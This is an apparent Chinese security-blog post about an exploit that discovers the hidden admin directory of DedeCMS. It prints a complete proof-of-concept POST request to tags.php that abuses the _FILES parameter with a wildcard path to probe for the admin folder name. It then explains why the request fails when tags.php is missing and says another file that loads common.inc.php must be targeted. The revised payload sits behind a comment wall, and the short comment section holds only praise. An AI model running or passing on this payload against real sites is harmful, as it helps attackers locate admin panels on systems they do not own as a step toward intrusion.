DEDECMS找后台目录(百发百中)分析出错原因【EXP】

2018-02-2814:23:15 4

原地址:DEDECMS找后台目录(百发百中)

分析原EXP出错原因

原POC:

http://localhost/dedecms/tags.php post: dopost=save&_FILES[b4dboy][tmp_name]=./de</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif

POST的是tags.php 属于根目录下的文件,在根目录下没有tags.php的情况下,需要找一个包含common.inc.php的文件,在这种情况下只能找二级目录下的文件,例如:/plus /include

那么如果根目录下不存在tags.php,POC的POST内同应该这样写

部分内容被隐藏
评论刷新后查看

 

DEDECMS找后台目录(百发百中)分析出错原因【EXP】

CE安全网
CE安全网广告位招租

发表评论

您必须登录才能发表评论!

目前评论:4   其中:访客  4   CE安全网官方  0

    • avatar daomeng 1

      佩服大牛

      • avatar saviou2r 2

        佩服大牛

        • avatar 看看都是什么玩意 0

          佩服大牛

          • avatar fangkai 3

            看看咋样